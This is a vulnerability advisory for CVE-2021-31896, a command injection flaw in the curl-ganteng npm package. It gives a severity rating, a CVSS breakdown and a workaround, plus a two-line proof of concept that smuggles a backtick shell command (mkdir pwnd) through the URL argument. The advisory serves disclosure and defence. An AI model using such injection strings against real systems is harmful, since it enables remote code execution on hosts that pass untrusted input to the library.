Command Injection Vulnerability In Curl-Ganteng - CVE-2021-31896 / CX-2021-4779

Severity

Severity: 9.8 - Critical Severity

Advisory Timeline Summary
Affected versions of `curl-ganteng` npm package are vulnerable to command injection vulnerability in the `curl` function.

Product

All versions of curl-ganteng npm package.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Steps To Reproduce

Run the following PoC:

var curl = require('curl-ganteng')
curl.curl("google.com' `mkdir pwnd`'").catch((a) => {console.log(a)}).then((a) => {console.log(a)})

Expected Result:

A new folder named ‘pwnd’ will be created.

Remediation

Currently there is no fix version released. As a workaround, avoid passing untrusted input into the vulnerable parameters when using the library.

Properties

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Unchanged

Confidentiality: High

Integrity: High

Availability: High

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. curl-gateng npm package